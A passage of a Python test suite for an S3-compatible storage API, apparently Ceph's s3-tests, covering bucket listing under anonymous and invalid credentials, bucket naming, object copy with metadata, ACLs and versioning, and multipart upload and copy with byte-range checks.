@attr(operation='list all buckets (anonymous)')
@attr(assertion='succeeds')
@attr('fails_on_aws')
def test_list_buckets_anonymous():
# Get a connection with bad authorization, then change it to be our new Anonymous auth mechanism,
# emulating standard HTTP access.
#
# While it may have been possible to use httplib directly, doing it this way takes care of also
# allowing us to vary the calling format in testing.
unauthenticated_client = get_unauthenticated_client()
response = unauthenticated_client.list_buckets()
eq(len(response['Buckets']), 0)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all buckets (bad auth)')
@attr(assertion='fails 403')
def test_list_buckets_invalid_auth():
bad_auth_client = get_bad_auth_client()
e = assert_raises(ClientError, bad_auth_client.list_buckets)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'InvalidAccessKeyId')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all buckets (bad auth)')
@attr(assertion='fails 403')
def test_list_buckets_bad_auth():
main_access_key = get_main_aws_access_key()
bad_auth_client = get_bad_auth_client(aws_access_key_id=main_access_key)
e = assert_raises(ClientError, bad_auth_client.list_buckets)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'SignatureDoesNotMatch')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create bucket')
@attr(assertion='name starts with alphabetic works')
# this test goes outside the user-configured prefix because it needs to
# control the initial character of the bucket name
@nose.with_setup(
setup=lambda: nuke_prefixed_buckets(prefix='a'+get_prefix()),
teardown=lambda: nuke_prefixed_buckets(prefix='a'+get_prefix()),
)
def test_bucket_create_naming_good_starts_alpha():
check_good_bucket_name('foo', _prefix='a'+get_prefix())
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create bucket')
@attr(assertion='name starts with numeric works')
# this test goes outside the user-configured prefix because it needs to
# control the initial character of the bucket name
@nose.with_setup(
setup=lambda: nuke_prefixed_buckets(prefix='0'+get_prefix()),
teardown=lambda: nuke_prefixed_buckets(prefix='0'+get_prefix()),
)
def test_bucket_create_naming_good_starts_digit():
check_good_bucket_name('foo', _prefix='0'+get_prefix())
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create bucket')
@attr(assertion='name containing dot works')
def test_bucket_create_naming_good_contains_period():
check_good_bucket_name('aaa.111')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create bucket')
@attr(assertion='name containing hyphen works')
def test_bucket_create_naming_good_contains_hyphen():
check_good_bucket_name('aaa-111')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create bucket with objects and recreate it')
@attr(assertion='bucket recreation not overriding index')
def test_bucket_recreate_not_overriding():
key_names = ['mykey1', 'mykey2']
bucket_name = _create_objects(keys=key_names)
objs_list = get_objects_list(bucket_name)
eq(key_names, objs_list)
client = get_client()
client.create_bucket(Bucket=bucket_name)
objs_list = get_objects_list(bucket_name)
eq(key_names, objs_list)
@attr(resource='object')
@attr(method='put')
@attr(operation='create and list objects with special names')
@attr(assertion='special names work')
def test_bucket_create_special_key_names():
key_names = [
' ',
'"',
'$',
'%',
'&',
'\'',
'<',
'>',
'_',
'_ ',
'_ _',
'__',
]
bucket_name = _create_objects(keys=key_names)
objs_list = get_objects_list(bucket_name)
eq(key_names, objs_list)
client = get_client()
for name in key_names:
eq((name in objs_list), True)
response = client.get_object(Bucket=bucket_name, Key=name)
body = _get_body(response)
eq(name, body)
client.put_object_acl(Bucket=bucket_name, Key=name, ACL='private')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='create and list objects with underscore as prefix, list using prefix')
@attr(assertion='listing works correctly')
def test_bucket_list_special_prefix():
key_names = ['_bla/1', '_bla/2', '_bla/3', '_bla/4', 'abcd']
bucket_name = _create_objects(keys=key_names)
objs_list = get_objects_list(bucket_name)
eq(len(objs_list), 5)
objs_list = get_objects_list(bucket_name, prefix='_bla/')
eq(len(objs_list), 4)
@attr(resource='object')
@attr(method='put')
@attr(operation='copy zero sized object in same bucket')
@attr(assertion='works')
def test_object_copy_zero_size():
key = 'foo123bar'
bucket_name = _create_objects(keys=[key])
fp_a = FakeWriteFile(0, '')
client = get_client()
client.put_object(Bucket=bucket_name, Key=key, Body=fp_a)
copy_source = {'Bucket': bucket_name, 'Key': key}
client.copy(copy_source, bucket_name, 'bar321foo')
response = client.get_object(Bucket=bucket_name, Key='bar321foo')
eq(response['ContentLength'], 0)
@attr(resource='object')
@attr(method='put')
@attr(operation='copy object in same bucket')
@attr(assertion='works')
def test_object_copy_same_bucket():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo123bar', Body='foo')
copy_source = {'Bucket': bucket_name, 'Key': 'foo123bar'}
client.copy(copy_source, bucket_name, 'bar321foo')
response = client.get_object(Bucket=bucket_name, Key='bar321foo')
body = _get_body(response)
eq('foo', body)
@attr(resource='object')
@attr(method='put')
@attr(operation='copy object with content-type')
@attr(assertion='works')
def test_object_copy_verify_contenttype():
bucket_name = get_new_bucket()
client = get_client()
content_type = 'text/bla'
client.put_object(Bucket=bucket_name, ContentType=content_type, Key='foo123bar', Body='foo')
copy_source = {'Bucket': bucket_name, 'Key': 'foo123bar'}
client.copy(copy_source, bucket_name, 'bar321foo')
response = client.get_object(Bucket=bucket_name, Key='bar321foo')
body = _get_body(response)
eq('foo', body)
response_content_type = response['ContentType']
eq(response_content_type, content_type)
@attr(resource='object')
@attr(method='put')
@attr(operation='copy object to itself')
@attr(assertion='fails')
def test_object_copy_to_itself():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo123bar', Body='foo')
copy_source = {'Bucket': bucket_name, 'Key': 'foo123bar'}
e = assert_raises(ClientError, client.copy, copy_source, bucket_name, 'foo123bar')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidRequest')
@attr(resource='object')
@attr(method='put')
@attr(operation='modify object metadata by copying')
@attr(assertion='fails')
def test_object_copy_to_itself_with_metadata():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo123bar', Body='foo')
copy_source = {'Bucket': bucket_name, 'Key': 'foo123bar'}
metadata = {'foo': 'bar'}
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key='foo123bar', Metadata=metadata, MetadataDirective='REPLACE')
response = client.get_object(Bucket=bucket_name, Key='foo123bar')
eq(response['Metadata'], metadata)
@attr(resource='object')
@attr(method='put')
@attr(operation='copy object from different bucket')
@attr(assertion='works')
def test_object_copy_diff_bucket():
bucket_name1 = get_new_bucket()
bucket_name2 = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name1, Key='foo123bar', Body='foo')
copy_source = {'Bucket': bucket_name1, 'Key': 'foo123bar'}
client.copy(copy_source, bucket_name2, 'bar321foo')
response = client.get_object(Bucket=bucket_name2, Key='bar321foo')
body = _get_body(response)
eq('foo', body)
@attr(resource='object')
@attr(method='put')
@attr(operation='copy to an inaccessible bucket')
@attr(assertion='fails w/AttributeError')
def test_object_copy_not_owned_bucket():
client = get_client()
alt_client = get_alt_client()
bucket_name1 = get_new_bucket_name()
bucket_name2 = get_new_bucket_name()
client.create_bucket(Bucket=bucket_name1)
alt_client.create_bucket(Bucket=bucket_name2)
client.put_object(Bucket=bucket_name1, Key='foo123bar', Body='foo')
copy_source = {'Bucket': bucket_name1, 'Key': 'foo123bar'}
e = assert_raises(ClientError, alt_client.copy, copy_source, bucket_name2, 'bar321foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
@attr(resource='object')
@attr(method='put')
@attr(operation='copy a non-owned object in a non-owned bucket, but with perms')
@attr(assertion='works')
def test_object_copy_not_owned_object_bucket():
client = get_client()
alt_client = get_alt_client()
bucket_name = get_new_bucket_name()
client.create_bucket(Bucket=bucket_name)
client.put_object(Bucket=bucket_name, Key='foo123bar', Body='foo')
alt_user_id = get_alt_user_id()
grant = {'Grantee': {'ID': alt_user_id, 'Type': 'CanonicalUser' }, 'Permission': 'FULL_CONTROL'}
grants = add_obj_user_grant(bucket_name, 'foo123bar', grant)
client.put_object_acl(Bucket=bucket_name, Key='foo123bar', AccessControlPolicy=grants)
grant = add_bucket_user_grant(bucket_name, grant)
client.put_bucket_acl(Bucket=bucket_name, AccessControlPolicy=grant)
alt_client.get_object(Bucket=bucket_name, Key='foo123bar')
copy_source = {'Bucket': bucket_name, 'Key': 'foo123bar'}
alt_client.copy(copy_source, bucket_name, 'bar321foo')
@attr(resource='object')
@attr(method='put')
@attr(operation='copy object and change acl')
@attr(assertion='works')
def test_object_copy_canned_acl():
bucket_name = get_new_bucket()
client = get_client()
alt_client = get_alt_client()
client.put_object(Bucket=bucket_name, Key='foo123bar', Body='foo')
copy_source = {'Bucket': bucket_name, 'Key': 'foo123bar'}
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key='bar321foo', ACL='public-read')
# check ACL is applied by doing GET from another user
alt_client.get_object(Bucket=bucket_name, Key='bar321foo')
metadata={'abc': 'def'}
copy_source = {'Bucket': bucket_name, 'Key': 'bar321foo'}
client.copy_object(ACL='public-read', Bucket=bucket_name, CopySource=copy_source, Key='foo123bar', Metadata=metadata, MetadataDirective='REPLACE')
# check ACL is applied by doing GET from another user
alt_client.get_object(Bucket=bucket_name, Key='foo123bar')
@attr(resource='object')
@attr(method='put')
@attr(operation='copy object and retain metadata')
def test_object_copy_retaining_metadata():
for size in [3, 1024 * 1024]:
bucket_name = get_new_bucket()
client = get_client()
content_type = 'audio/ogg'
metadata = {'key1': 'value1', 'key2': 'value2'}
client.put_object(Bucket=bucket_name, Key='foo123bar', Metadata=metadata, ContentType=content_type, Body=bytearray(size))
copy_source = {'Bucket': bucket_name, 'Key': 'foo123bar'}
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key='bar321foo')
response = client.get_object(Bucket=bucket_name, Key='bar321foo')
eq(content_type, response['ContentType'])
eq(metadata, response['Metadata'])
body = _get_body(response)
eq(size, response['ContentLength'])
@attr(resource='object')
@attr(method='put')
@attr(operation='copy object and replace metadata')
def test_object_copy_replacing_metadata():
for size in [3, 1024 * 1024]:
bucket_name = get_new_bucket()
client = get_client()
content_type = 'audio/ogg'
metadata = {'key1': 'value1', 'key2': 'value2'}
client.put_object(Bucket=bucket_name, Key='foo123bar', Metadata=metadata, ContentType=content_type, Body=bytearray(size))
metadata = {'key3': 'value3', 'key2': 'value2'}
content_type = 'audio/mpeg'
copy_source = {'Bucket': bucket_name, 'Key': 'foo123bar'}
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key='bar321foo', Metadata=metadata, MetadataDirective='REPLACE', ContentType=content_type)
response = client.get_object(Bucket=bucket_name, Key='bar321foo')
eq(content_type, response['ContentType'])
eq(metadata, response['Metadata'])
eq(size, response['ContentLength'])
@attr(resource='object')
@attr(method='put')
@attr(operation='copy from non-existent bucket')
def test_object_copy_bucket_not_found():
bucket_name = get_new_bucket()
client = get_client()
copy_source = {'Bucket': bucket_name + "-fake", 'Key': 'foo123bar'}
e = assert_raises(ClientError, client.copy, copy_source, bucket_name, 'bar321foo')
status = _get_status(e.response)
eq(status, 404)
@attr(resource='object')
@attr(method='put')
@attr(operation='copy from non-existent object')
def test_object_copy_key_not_found():
bucket_name = get_new_bucket()
client = get_client()
copy_source = {'Bucket': bucket_name, 'Key': 'foo123bar'}
e = assert_raises(ClientError, client.copy, copy_source, bucket_name, 'bar321foo')
status = _get_status(e.response)
eq(status, 404)
@attr(resource='object')
@attr(method='put')
@attr(operation='copy object to/from versioned bucket')
@attr(assertion='works')
@attr('versioning')
def test_object_copy_versioned_bucket():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
size = 1*5
data = bytearray(size)
data_str = data.decode()
key1 = 'foo123bar'
client.put_object(Bucket=bucket_name, Key=key1, Body=data)
response = client.get_object(Bucket=bucket_name, Key=key1)
version_id = response['VersionId']
# copy object in the same bucket
copy_source = {'Bucket': bucket_name, 'Key': key1, 'VersionId': version_id}
key2 = 'bar321foo'
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key=key2)
response = client.get_object(Bucket=bucket_name, Key=key2)
body = _get_body(response)
eq(data_str, body)
eq(size, response['ContentLength'])
# second copy
version_id2 = response['VersionId']
copy_source = {'Bucket': bucket_name, 'Key': key2, 'VersionId': version_id2}
key3 = 'bar321foo2'
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key=key3)
response = client.get_object(Bucket=bucket_name, Key=key3)
body = _get_body(response)
eq(data_str, body)
eq(size, response['ContentLength'])
# copy to another versioned bucket
bucket_name2 = get_new_bucket()
check_configure_versioning_retry(bucket_name2, "Enabled", "Enabled")
copy_source = {'Bucket': bucket_name, 'Key': key1, 'VersionId': version_id}
key4 = 'bar321foo3'
client.copy_object(Bucket=bucket_name2, CopySource=copy_source, Key=key4)
response = client.get_object(Bucket=bucket_name2, Key=key4)
body = _get_body(response)
eq(data_str, body)
eq(size, response['ContentLength'])
# copy to another non versioned bucket
bucket_name3 = get_new_bucket()
copy_source = {'Bucket': bucket_name, 'Key': key1, 'VersionId': version_id}
key5 = 'bar321foo4'
client.copy_object(Bucket=bucket_name3, CopySource=copy_source, Key=key5)
response = client.get_object(Bucket=bucket_name3, Key=key5)
body = _get_body(response)
eq(data_str, body)
eq(size, response['ContentLength'])
# copy from a non versioned bucket
copy_source = {'Bucket': bucket_name3, 'Key': key5}
key6 = 'foo123bar2'
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key=key6)
response = client.get_object(Bucket=bucket_name, Key=key6)
body = _get_body(response)
eq(data_str, body)
eq(size, response['ContentLength'])
@attr(resource='object')
@attr(method='put')
@attr(operation='copy object to/from versioned bucket with url-encoded name')
@attr(assertion='works')
@attr('versioning')
def test_object_copy_versioned_url_encoding():
bucket = get_new_bucket_resource()
check_configure_versioning_retry(bucket.name, "Enabled", "Enabled")
src_key = 'foo?bar'
src = bucket.put_object(Key=src_key)
src.load() # HEAD request tests that the key exists
# copy object in the same bucket
dst_key = 'bar&foo'
dst = bucket.Object(dst_key)
dst.copy_from(CopySource={'Bucket': src.bucket_name, 'Key': src.key, 'VersionId': src.version_id})
dst.load() # HEAD request tests that the key exists
def generate_random(size, part_size=5*1024*1024):
"""
Generate the specified number of characters of random data, yielded
in chunks of at most part_size (each chunk repeats its first KB).
"""
chunk = 1024
allowed = string.ascii_letters
for x in range(0, size, part_size):
strpart = ''.join([allowed[random.randint(0, len(allowed) - 1)] for _ in range(chunk)])
s = ''
left = size - x
this_part_size = min(left, part_size)
for y in range(this_part_size // chunk):
s = s + strpart
if this_part_size > len(s):
s = s + strpart[0:this_part_size - len(s)]
yield s
if (x == size):
return
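# Illustrative sketch (not used by the tests): joining the yielded chunks reproduces
# exactly `size` characters, e.g. generate_random(10, part_size=4) yields pieces of
# length 4, 4 and 2.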
def _multipart_upload(bucket_name, key, size, part_size=5*1024*1024, client=None, content_type=None, metadata=None, resend_parts=[]):
"""
Generate a multi-part upload for a random file of specified size.
Parts whose index appears in resend_parts are uploaded a second time.
Returns a tuple of (upload_id, concatenated payload, parts list).
"""
if client is None:
client = get_client()
if content_type is None and metadata is None:
response = client.create_multipart_upload(Bucket=bucket_name, Key=key)
else:
response = client.create_multipart_upload(Bucket=bucket_name, Key=key, Metadata=metadata, ContentType=content_type)
upload_id = response['UploadId']
s = ''
parts = []
for i, part in enumerate(generate_random(size, part_size)):
# part_num is necessary because PartNumber must start at 1 (both for upload_part and in the parts list), while enumerate() starts i at 0
part_num = i+1
s += part
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key, PartNumber=part_num, Body=part)
parts.append({'ETag': response['ETag'].strip('"'), 'PartNumber': part_num})
if i in resend_parts:
client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key, PartNumber=part_num, Body=part)
return (upload_id, s, parts)
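# Typical call pattern (mirrors the tests below; bucket_name/key/objlen are whatever the test created):
#     (upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen)
#     client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id,
#                                      MultipartUpload={'Parts': parts})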
@attr(resource='object')
@attr(method='put')
@attr(operation='test copy object of a multipart upload')
@attr(assertion='successful')
@attr('versioning')
def test_object_copy_versioning_multipart_upload():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key1 = "srcmultipart"
key1_metadata = {'foo': 'bar'}
content_type = 'text/bla'
objlen = 30 * 1024 * 1024
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key1, size=objlen, content_type=content_type, metadata=key1_metadata)
client.complete_multipart_upload(Bucket=bucket_name, Key=key1, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.get_object(Bucket=bucket_name, Key=key1)
key1_size = response['ContentLength']
version_id = response['VersionId']
# copy object in the same bucket
copy_source = {'Bucket': bucket_name, 'Key': key1, 'VersionId': version_id}
key2 = 'dstmultipart'
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key=key2)
response = client.get_object(Bucket=bucket_name, Key=key2)
version_id2 = response['VersionId']
body = _get_body(response)
eq(data, body)
eq(key1_size, response['ContentLength'])
eq(key1_metadata, response['Metadata'])
eq(content_type, response['ContentType'])
# second copy
copy_source = {'Bucket': bucket_name, 'Key': key2, 'VersionId': version_id2}
key3 = 'dstmultipart2'
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key=key3)
response = client.get_object(Bucket=bucket_name, Key=key3)
body = _get_body(response)
eq(data, body)
eq(key1_size, response['ContentLength'])
eq(key1_metadata, response['Metadata'])
eq(content_type, response['ContentType'])
# copy to another versioned bucket
bucket_name2 = get_new_bucket()
check_configure_versioning_retry(bucket_name2, "Enabled", "Enabled")
copy_source = {'Bucket': bucket_name, 'Key': key1, 'VersionId': version_id}
key4 = 'dstmultipart3'
client.copy_object(Bucket=bucket_name2, CopySource=copy_source, Key=key4)
response = client.get_object(Bucket=bucket_name2, Key=key4)
body = _get_body(response)
eq(data, body)
eq(key1_size, response['ContentLength'])
eq(key1_metadata, response['Metadata'])
eq(content_type, response['ContentType'])
# copy to another non versioned bucket
bucket_name3 = get_new_bucket()
copy_source = {'Bucket': bucket_name, 'Key': key1, 'VersionId': version_id}
key5 = 'dstmultipart4'
client.copy_object(Bucket=bucket_name3, CopySource=copy_source, Key=key5)
response = client.get_object(Bucket=bucket_name3, Key=key5)
body = _get_body(response)
eq(data, body)
eq(key1_size, response['ContentLength'])
eq(key1_metadata, response['Metadata'])
eq(content_type, response['ContentType'])
# copy from a non versioned bucket
copy_source = {'Bucket': bucket_name3, 'Key': key5}
key6 = 'dstmultipart5'
client.copy_object(Bucket=bucket_name3, CopySource=copy_source, Key=key6)
response = client.get_object(Bucket=bucket_name3, Key=key6)
body = _get_body(response)
eq(data, body)
eq(key1_size, response['ContentLength'])
eq(key1_metadata, response['Metadata'])
eq(content_type, response['ContentType'])
@attr(resource='object')
@attr(method='put')
@attr(operation='check multipart upload without parts')
def test_multipart_upload_empty():
bucket_name = get_new_bucket()
client = get_client()
key1 = "mymultipart"
objlen = 0
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key1, size=objlen)
e = assert_raises(ClientError, client.complete_multipart_upload,Bucket=bucket_name, Key=key1, UploadId=upload_id)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
@attr(resource='object')
@attr(method='put')
@attr(operation='check multipart uploads with single small part')
def test_multipart_upload_small():
bucket_name = get_new_bucket()
client = get_client()
key1 = "mymultipart"
objlen = 1
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key1, size=objlen)
response = client.complete_multipart_upload(Bucket=bucket_name, Key=key1, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.get_object(Bucket=bucket_name, Key=key1)
eq(response['ContentLength'], objlen)
# a repeated complete_multipart_upload on the same upload id should also succeed
response = client.complete_multipart_upload(Bucket=bucket_name, Key=key1, UploadId=upload_id, MultipartUpload={'Parts': parts})
def _create_key_with_random_content(keyname, size=7*1024*1024, bucket_name=None, client=None):
if bucket_name is None:
bucket_name = get_new_bucket()
if client is None:
client = get_client()
data_str = str(next(generate_random(size, size)))
data = bytes(data_str, 'utf-8')
client.put_object(Bucket=bucket_name, Key=keyname, Body=data)
return bucket_name
def _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size, client=None, part_size=5*1024*1024, version_id=None):
if client is None:
client = get_client()
response = client.create_multipart_upload(Bucket=dest_bucket_name, Key=dest_key)
upload_id = response['UploadId']
if version_id is None:
copy_source = {'Bucket': src_bucket_name, 'Key': src_key}
else:
copy_source = {'Bucket': src_bucket_name, 'Key': src_key, 'VersionId': version_id}
parts = []
i = 0
for start_offset in range(0, size, part_size):
end_offset = min(start_offset + part_size - 1, size - 1)
part_num = i+1
copy_source_range = 'bytes={start}-{end}'.format(start=start_offset, end=end_offset)
response = client.upload_part_copy(Bucket=dest_bucket_name, Key=dest_key, CopySource=copy_source, PartNumber=part_num, UploadId=upload_id, CopySourceRange=copy_source_range)
parts.append({'ETag': response['CopyPartResult']['ETag'], 'PartNumber': part_num})
i = i+1
return (upload_id, parts)
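# Range arithmetic sketch: for size=10 and part_size=4 the helper above issues three
# upload_part_copy calls with CopySourceRange 'bytes=0-3', 'bytes=4-7' and 'bytes=8-9'
# (ranges are inclusive, so each part covers end - start + 1 bytes of the source).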
def _check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name, version_id=None):
client = get_client()
if version_id is None:
response = client.get_object(Bucket=src_bucket_name, Key=src_key)
else:
response = client.get_object(Bucket=src_bucket_name, Key=src_key, VersionId=version_id)
src_size = response['ContentLength']
response = client.get_object(Bucket=dest_bucket_name, Key=dest_key)
dest_size = response['ContentLength']
dest_data = _get_body(response)
assert src_size >= dest_size
r = 'bytes={s}-{e}'.format(s=0, e=dest_size-1)
if version_id is None:
response = client.get_object(Bucket=src_bucket_name, Key=src_key, Range=r)
else:
response = client.get_object(Bucket=src_bucket_name, Key=src_key, Range=r, VersionId=version_id)
src_data = _get_body(response)
eq(src_data, dest_data)
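# Note: the destination may be a partial (ranged) copy of the source, so the helper above
# only requires src_size >= dest_size and compares the first dest_size bytes of both objects.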
@attr(resource='object')
@attr(method='put')
@attr(operation='check multipart copies with single small part')
def test_multipart_copy_small():
src_key = 'foo'
src_bucket_name = _create_key_with_random_content(src_key)
dest_bucket_name = get_new_bucket()
dest_key = "mymultipart"
size = 1
client = get_client()
(upload_id, parts) = _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size)
client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.get_object(Bucket=dest_bucket_name, Key=dest_key)
eq(size, response['ContentLength'])
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name)
@attr(resource='object')
@attr(method='put')
@attr(operation='check multipart copies with an invalid range')
def test_multipart_copy_invalid_range():
client = get_client()
src_key = 'source'
src_bucket_name = _create_key_with_random_content(src_key, size=5)
response = client.create_multipart_upload(Bucket=src_bucket_name, Key='dest')
upload_id = response['UploadId']
copy_source = {'Bucket': src_bucket_name, 'Key': src_key}
copy_source_range = 'bytes={start}-{end}'.format(start=0, end=21)
e = assert_raises(ClientError, client.upload_part_copy,Bucket=src_bucket_name, Key='dest', UploadId=upload_id, CopySource=copy_source, CopySourceRange=copy_source_range, PartNumber=1)
status, error_code = _get_status_and_error_code(e.response)
valid_status = [400, 416]
if status not in valid_status:
raise AssertionError("Invalid response " + str(status))
eq(error_code, 'InvalidRange')
@attr(resource='object')
@attr(method='put')
@attr(operation='check multipart copy with an improperly formatted range')
# TODO: remove fails_on_rgw when https://tracker.ceph.com/issues/40795 is resolved
@attr('fails_on_rgw')
def test_multipart_copy_improper_range():
client = get_client()
src_key = 'source'
src_bucket_name = _create_key_with_random_content(src_key, size=5)
response = client.create_multipart_upload(
Bucket=src_bucket_name, Key='dest')
upload_id = response['UploadId']
copy_source = {'Bucket': src_bucket_name, 'Key': src_key}
test_ranges = ['{start}-{end}'.format(start=0, end=2),
'bytes={start}'.format(start=0),
'bytes=hello-world',
'bytes=0-bar',
'bytes=hello-',
'bytes=0-2,3-5']
for test_range in test_ranges:
e = assert_raises(ClientError, client.upload_part_copy,
Bucket=src_bucket_name, Key='dest',
UploadId=upload_id,
CopySource=copy_source,
CopySourceRange=test_range,
PartNumber=1)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidArgument')
@attr(resource='object')
@attr(method='put')
@attr(operation='check multipart copies without x-amz-copy-source-range')
def test_multipart_copy_without_range():
client = get_client()
src_key = 'source'
src_bucket_name = _create_key_with_random_content(src_key, size=10)
dest_bucket_name = get_new_bucket_name()
get_new_bucket(name=dest_bucket_name)
dest_key = "mymultipartcopy"
response = client.create_multipart_upload(Bucket=dest_bucket_name, Key=dest_key)
upload_id = response['UploadId']
parts = []
copy_source = {'Bucket': src_bucket_name, 'Key': src_key}
part_num = 1
copy_source_range = 'bytes={start}-{end}'.format(start=0, end=9)
response = client.upload_part_copy(Bucket=dest_bucket_name, Key=dest_key, CopySource=copy_source, PartNumber=part_num, UploadId=upload_id)
parts.append({'ETag': response['CopyPartResult']['ETag'], 'PartNumber': part_num})
client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.get_object(Bucket=dest_bucket_name, Key=dest_key)
eq(response['ContentLength'], 10)
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name)
@attr(resource='object')
@attr(method='put')
@attr(operation='check multipart copies of objects with special names')
def test_multipart_copy_special_names():
src_bucket_name = get_new_bucket()
dest_bucket_name = get_new_bucket()
dest_key = "mymultipart"
size = 1
client = get_client()
for src_key in (' ', '_', '__', '?versionId'):
_create_key_with_random_content(src_key, bucket_name=src_bucket_name)
(upload_id, parts) = _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size)
response = client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.get_object(Bucket=dest_bucket_name, Key=dest_key)
eq(size, response['ContentLength'])
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name)
def _check_content_using_range(key, bucket_name, data, step):
client = get_client()
response = client.get_object(Bucket=bucket_name, Key=key)
size = response['ContentLength']
for ofs in range(0, size, step):
toread = size - ofs
if toread > step:
toread = step
end = ofs + toread - 1
r = 'bytes={s}-{e}'.format(s=ofs, e=end)
response = client.get_object(Bucket=bucket_name, Key=key, Range=r)
eq(response['ContentLength'], toread)
body = _get_body(response)
eq(body, data[ofs:end+1])
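# The helper above walks the object in step-sized windows and the final window may be
# shorter: e.g. a 25-byte object checked with step=10 issues the ranges 'bytes=0-9',
# 'bytes=10-19' and 'bytes=20-24'.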
@attr(resource='object')
@attr(method='put')
@attr(operation='complete multi-part upload')
@attr(assertion='successful')
@attr('fails_on_aws')
def test_multipart_upload():
bucket_name = get_new_bucket()
key="mymultipart"
content_type='text/bla'
objlen = 30 * 1024 * 1024
metadata = {'foo': 'bar'}
client = get_client()
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen, content_type=content_type, metadata=metadata)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
# a repeated complete_multipart_upload on the same upload id should also succeed
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.head_bucket(Bucket=bucket_name)
rgw_bytes_used = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-bytes-used', objlen))
eq(rgw_bytes_used, objlen)
rgw_object_count = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-object-count', 1))
eq(rgw_object_count, 1)
response = client.get_object(Bucket=bucket_name, Key=key)
eq(response['ContentType'], content_type)
eq(response['Metadata'], metadata)
body = _get_body(response)
eq(len(body), response['ContentLength'])
eq(body, data)
_check_content_using_range(key, bucket_name, data, 1000000)
_check_content_using_range(key, bucket_name, data, 10000000)
def check_versioning(bucket_name, status):
client = get_client()
try:
response = client.get_bucket_versioning(Bucket=bucket_name)
eq(response['Status'], status)
except KeyError:
eq(status, None)
# Amazon is eventually consistent; retry a few times if the first read disagrees
def check_configure_versioning_retry(bucket_name, status, expected_string):
client = get_client()
client.put_bucket_versioning(Bucket=bucket_name, VersioningConfiguration={'Status': status})
read_status = None
for i in range(5):
try:
response = client.get_bucket_versioning(Bucket=bucket_name)
read_status = response['Status']
except KeyError:
read_status = None
if expected_string == read_status:
break
time.sleep(1)
eq(expected_string, read_status)
@attr(resource='object')
@attr(method='put')
@attr(operation='check multipart copies of versioned objects')
@attr('versioning')
def test_multipart_copy_versioned():
src_bucket_name = get_new_bucket()
dest_bucket_name = get_new_bucket()
dest_key = "mymultipart"
check_versioning(src_bucket_name, None)
src_key = 'foo'
check_configure_versioning_retry(src_bucket_name, "Enabled", "Enabled")
size = 15 * 1024 * 1024
_create_key_with_random_content(src_key, size=size, bucket_name=src_bucket_name)
_create_key_with_random_content(src_key, size=size, bucket_name=src_bucket_name)
_create_key_with_random_content(src_key, size=size, bucket_name=src_bucket_name)
version_id = []
client = get_client()
response = client.list_object_versions(Bucket=src_bucket_name)
for ver in response['Versions']:
version_id.append(ver['VersionId'])
for vid in version_id:
(upload_id, parts) = _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size, version_id=vid)
response = client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.get_object(Bucket=dest_bucket_name, Key=dest_key)
eq(size, response['ContentLength'])
